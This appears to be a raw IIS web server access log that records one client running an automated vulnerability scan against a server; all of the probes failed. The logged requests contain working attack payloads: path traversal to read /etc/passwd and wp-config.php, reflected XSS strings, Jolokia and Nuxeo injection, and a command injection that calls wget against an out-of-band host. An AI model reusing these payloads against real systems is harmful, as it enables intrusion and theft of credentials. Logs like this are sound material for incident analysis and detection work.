2023-06-29 14:50:47 103.153.214.94 POST /cgi-bin/webproc - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 404 7 0 30 2023-06-29 14:52:34 103.153.214.94 GET /public/index.php s=/index/qrcode/download/url/L2V0Yy9wYXNzd2Q= 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+4.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 404 7 0 28 2023-06-29 15:00:00 103.153.214.94 GET /jolokia/exec/ch.qos.logback.classic:Name=default,Type=ch.qos.logback.classic.jmx.JMXConfigurator/reloadByURL/http:!/!/nonexistent:31337!/logback.xml - 8172 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.1916.47+Safari/537.36 - 400 0 0 30 2023-06-29 15:00:00 103.153.214.94 GET /actuator/jolokia/exec/ch.qos.logback.classic:Name=default,Type=ch.qos.logback.classic.jmx.JMXConfigurator/reloadByURL/http:!/!/random:915!/logback.xml - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 400 0 0 28 2023-06-29 15:02:36 103.153.214.94 GET /index.php action=show_error&dir=..%2F..%2F..%2F%2F..%2F..%2Fetc%2Fpasswd&option=com_extplorer 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.3319.102+Safari/537.36 - 404 7 0 28 2023-06-29 15:10:02 103.153.214.94 GET /index.php controller==../../../../../../../../../../etc/passwd%00&option=com_preventive 8172 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.1916.47+Safari/537.36 - 404 7 0 26 2023-06-29 15:12:05 103.153.214.94 GET /index.php controller=../../../../../../../../../../etc/passwd%00&option=com_perchagallery 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2117.157+Safari/537.36 - 404 7 0 27 2023-06-29 15:19:53 103.153.214.94 POST /cobbler_api - 8172 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2062.124+Safari/537.36 - 404 7 0 33 2023-06-29 15:19:53 103.153.214.94 POST /cobbler_api - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 404 7 0 23 2023-06-29 15:30:39 103.153.214.94 GET /setup.cgi next_file=debug.htm&x=currentsetting.htm 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 404 7 0 27 2023-06-29 15:45:39 103.153.214.94 GET /siteminderagent/forms/smpwservices.fcc SMAUTHREASON=7&USERNAME=\u003cimg\u0020src\u003dx\u0020onerror\u003d\u0022confirm(document.domain)\u0022\u003e 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2226.0+Safari/537.36 - 404 7 0 28 2023-06-29 15:45:39 103.153.214.94 GET /siteminderagent/forms/smaceauth.fcc SMAUTHREASON=7&USERNAME=\u003cimg\u0020src\u003dx\u0020onerror\u003d\u0022confirm(document.domain)\u0022\u003e 8172 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.1916.47+Safari/537.36 - 404 7 0 24 2023-06-29 15:51:04 103.153.214.94 GET /wp-admin/admin-ajax.php action=duplicator_download&file=..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/40.0.2214.93+Safari/537.36 - 404 7 0 26 2023-06-29 15:51:04 103.153.214.94 GET /wp-admin/admin-ajax.php action=duplicator_download&file=%2F..%2Fwp-config.php 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 7 0 24 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2023-06-29 16:12:44 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2023-06-29 16:12:44 103.153.214.94 GET /mailsms/s dumpConfig=/&func=ADMIN:appState 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2224.3+Safari/537.36 - 404 7 0 29 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2023-06-29 16:29:16 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2023-06-29 16:29:16 103.153.214.94 GET / action=edit&fileName=..\..\..\windows\win.ini&h=44ea8a6603cbf54e245f37b4ddaf8f36&page=vlf 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.36 - 404 7 0 38 2023-06-29 16:29:16 103.153.214.94 GET /source/loggin/page_log_dwn_file.hsp action=download&fileName=..\..\..\windows\win.ini&h=44ea8a6603cbf54e245f37b4ddaf8f36 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 404 7 0 25 2023-06-29 16:34:48 103.153.214.94 POST /dashboard/uploadID.php - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 404 7 0 29 2023-06-29 16:41:10 103.153.214.94 GET /wp-content/plugins/jsmol2wp/php/jsmol.php call=getRawDataFromDatabase&isform=true&query=php://filter/resource=../../../../wp-config.php 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+4.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 404 7 0 30 2023-06-29 16:42:45 103.153.214.94 GET /solr/admin/cores wt=json 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2224.3+Safari/537.36 - 404 7 0 27 2023-06-29 16:46:22 103.153.214.94 GET /crx/explorer/nodetypes/index.jsp - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 404 7 0 27 2023-06-29 16:48:06 103.153.214.94 GET /__clockwork/latest - 8172 - 45.117.82.231 Mozilla/5.0+(X11;+Ubuntu;+Linux+i686+on+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/53.0.2820.59+Safari/537.36 - 404 7 0 29 2023-06-29 17:02:31 103.153.214.94 GET /Solar_SlideSub.php bgcolor=green&id=4&play=1&pow=sds%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E%3C%22 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2226.0+Safari/537.36 - 404 7 0 28 2023-06-29 17:06:12 103.153.214.94 POST /api/v1/user/login - 8172 - 45.117.82.231 Mozilla/5.0+(X11;+OpenBSD+i386)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.125+Safari/537.36 - 404 7 0 30 2023-06-29 17:08:29 103.153.214.94 GET /Setup/index.php/ - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.2;+WOW64)+AppleWebKit/537.36+(KHTML+like+Gecko)+Chrome/44.0.2403.155+Safari/537.36 - 404 7 0 35 2023-06-29 17:14:05 103.153.214.94 POST /cgi-bin/supportInstaller - 8172 - 45.117.82.231 MSIE - 404 7 0 28 2023-06-29 17:28:51 103.153.214.94 POST /install/install.php step=4 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 404 7 0 30 2023-06-29 17:28:51 103.153.214.94 GET /install/includes/configure.php - 8172 - 45.117.82.231 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 404 7 0 23 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2023-06-29 18:03:06 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2023-06-29 18:03:06 103.153.214.94 GET /index.php controller=../../../../../../../../../../etc/passwd%00&option=com_janews 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.36 - 404 7 0 31 2023-06-29 18:03:35 103.153.214.94 GET /_nuxt/@fs/etc/passwd - 8172 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36 - 404 7 0 32 2023-06-29 18:03:35 103.153.214.94 GET /_nuxt/@fs/windows/win.ini - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1866.237+Safari/537.36 - 404 7 0 24 2023-06-29 18:10:46 103.153.214.94 GET /wp-content/plugins/count-per-day/download.php f=/etc/passwd&n=1 8172 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.1+Safari/537.36 - 404 7 0 29 2023-06-29 18:14:32 103.153.214.94 GET /nuxeo/login.jsp/pwn${31333333330+7}.xhtml - 8172 - 45.117.82.231 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/55.0.2919.83+Safari/537.36 - 404 11 0 30 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2023-06-29 18:43:51 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2023-06-29 18:43:51 103.153.214.94 GET /index.php/Pan/ShareUrl/downloadSharedFile file_name=win.ini&true_path=../../../../../../windows/win.ini 8172 - 45.117.82.231 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/55.0.2919.83+Safari/537.36 - 404 7 0 29 2023-06-29 18:44:16 103.153.214.94 GET /index.php content=../../../../../../../../etc/passwd 8172 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.1+Safari/537.36 - 404 7 0 25 2023-06-29 18:44:22 103.153.214.94 GET /index.php controller=../../../../../../../../../../etc/passwd%00&option=com_jvideodirect 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 404 7 0 26 2023-06-29 18:45:08 103.153.214.94 GET /certmngr.cgi action=createselfcert&commonname=anything&country=AA&days=1&local=anything&organization=anything&organizationunit=anything&state=%24(wget%20http://cibehhqofm2ke57n2m2g6g9qnb9hc7qbi.oast.live)&type=anything 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 7 0 29 2023-06-29 18:53:52 103.153.214.94 GET /pentaho/api/userrolelist/systemRoles require-cfg.js 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.4;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 404 7 0 33 2023-06-29 18:53:52 103.153.214.94 GET /api/userrolelist/systemRoles require-cfg.js 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.77+Safari/537.36 - 404 7 0 23 2023-06-29 18:59:55 103.153.214.94 POST /appInfo/assert - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/40.0.2214.93+Safari/537.36 - 404 7 0 29 2023-06-29 19:09:39 103.153.214.94 GET /version.web - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.3319.102+Safari/537.36 - 404 7 0 28 2023-06-29 19:15:51 103.153.214.94 GET /fhem/FileLog_logWrapper dev=Logfile&file=%2fetc%2fpasswd&type=text 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 404 7 0 31 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2023-06-29 19:36:28 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2023-06-29 19:36:28 103.153.214.94 GET /api/v1/namespaces/kube-system/secrets/kubernetes-dashboard-certs - 8172 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2762.73+Safari/537.36 - 404 7 0 28 2023-06-29 19:36:28 103.153.214.94 GET /k8s/api/v1/namespaces/kube-system/secrets/kubernetes-dashboard-certs - 8172 - 45.117.82.231 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1847.137+Safari/4E423F - 404 7 0 27 2023-06-29 19:42:03 103.153.214.94 GET /wp-content/plugins/pie-register/readme.txt - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.77+Safari/537.36 - 404 7 0 30 2023-06-29 19:42:03 103.153.214.94 POST /login/ - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.36 - 404 7 0 24 2023-06-29 19:42:03 103.153.214.94 GET /wp-admin/profile.php - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2309.372+Safari/537.36 - 404 7 0 22 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2023-06-29 19:59:20 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2023-06-29 19:59:20 103.153.214.94 GET /wp-content/plugins/ad-widget/views/modal/ step=../../../../../../../etc/passwd%00 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.2;+WOW64)+AppleWebKit/537.36+(KHTML+like+Gecko)+Chrome/44.0.2403.155+Safari/537.36 - 404 7 0 29 2023-06-29 20:00:18 103.153.214.94 GET /components/statestore - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.77+Safari/537.36 - 404 7 0 26 2023-06-29 20:00:18 103.153.214.94 GET /overview - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.3319.102+Safari/537.36 - 404 7 0 23 2023-06-29 20:00:18 103.153.214.94 GET /controlplane - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.3319.102+Safari/537.36 - 404 7 0 22 2023-06-29 20:08:33 103.153.214.94 GET /index.php option=com_jotloader§ion=../../../../../../../../../../../../../../etc/passwd%00 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.36 - 404 7 0 27 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2023-06-29 20:44:08 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2023-06-29 20:44:08 103.153.214.94 GET /hoteldruid/inizio.php - 8172 - 45.117.82.231 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 404 7 0 39 2023-06-29 20:44:08 103.153.214.94 GET /inizio.php - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 404 7 0 23 2023-06-29 20:48:19 103.153.214.94 GET /cgi-bin/luci - 8172 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2762.73+Safari/537.36 - 404 7 0 26 2023-06-29 20:55:16 103.153.214.94 GET /sysaid/getGfiUpgradeFile fileName=../../../../../../../etc/passwd 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 404 7 0 32 2023-06-29 20:55:16 103.153.214.94 GET /getGfiUpgradeFile fileName=../../../../../../../etc/passwd 8172 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.1+Safari/537.36 - 404 7 0 29 2023-06-29 20:56:23 103.153.214.94 GET /index.php controller=../../../../../../../../../../etc/passwd%00&option=com_ckforms 8172 - 45.117.82.231 Mozilla/5.0+(X11;+OpenBSD+i386)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.125+Safari/537.36 - 404 7 0 31 2023-06-29 21:02:28 103.153.214.94 GET /index.php option=com_jequoteform&view=../../../../../../etc/passwd%00 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.36 - 404 7 0 28 2023-06-29 21:06:49 103.153.214.94 GET /QH.aspx action=download&fileName=.%2fQH.aspx&responderId=ResourceNewResponder 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 7 0 28 2023-06-29 21:12:30 103.153.214.94 POST /search - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2226.0+Safari/537.36 - 404 7 0 28 2023-06-29 21:18:05 103.153.214.94 POST /public/index.php/material/Material/_download_imgage media_id=1&picUrl=./../config/database.php 8172 - 45.117.82.231 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/55.0.2919.83+Safari/537.36 - 404 7 0 36 2023-06-29 21:18:05 103.153.214.94 GET /public/index.php/home/file/user_pics - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2226.0+Safari/537.36 - 404 7 0 24 2023-06-29 21:19:44 103.153.214.94 POST / - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2224.3+Safari/537.36 - 404 7 0 26 2023-06-29 21:19:44 103.153.214.94 GET /2ReXb74co61Dhcfn3ZHjRPYK1cd.php/x0A - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2224.3+Safari/537.36 - 404 7 0 38 2023-06-29 21:24:52 103.153.214.94 GET /systemController/showOrDownByurl.do dbPath=../../../../../../etc/passwd&down 8172 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1944.0+Safari/537.36 - 404 7 0 29 2023-06-29 21:24:52 103.153.214.94 GET /systemController/showOrDownByurl.do dbPath=../Windows/win.ini&down 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2226.0+Safari/537.36 - 404 7 0 23 2023-06-29 21:29:10 103.153.214.94 GET /index.jsp - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/40.0.2214.93+Safari/537.36 - 404 7 0 26 2023-06-29 21:39:18 103.153.214.94 POST /ibmmq/console/j_security_check - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.36 https://bcvt.kontum.gov.vn:8172/ibmmq/console/login.html 404 7 0 29 2023-06-29 21:39:18 103.153.214.94 POST /ibmmq/console/j_security_check - 8172 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36 https://bcvt.kontum.gov.vn:8172/ibmmq/console/login.html 404 7 0 25 2023-06-29 21:39:18 103.153.214.94 POST /ibmmq/console/j_security_check - 8172 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2762.73+Safari/537.36 https://bcvt.kontum.gov.vn:8172/ibmmq/console/login.html 404 7 0 25 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2023-06-29 21:59:17 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2023-06-29 21:59:17 103.153.214.94 GET /wp-content/plugins/mail-masta/inc/campaign/count_of_send.php pl=/etc/passwd 8172 - 45.117.82.231 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/55.0.2919.83+Safari/537.36 - 404 7 0 33 2023-06-29 21:59:17 103.153.214.94 GET /wp-content/plugins/mail-masta/inc/lists/csvexport.php pl=/etc/passwd 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 404 7 0 26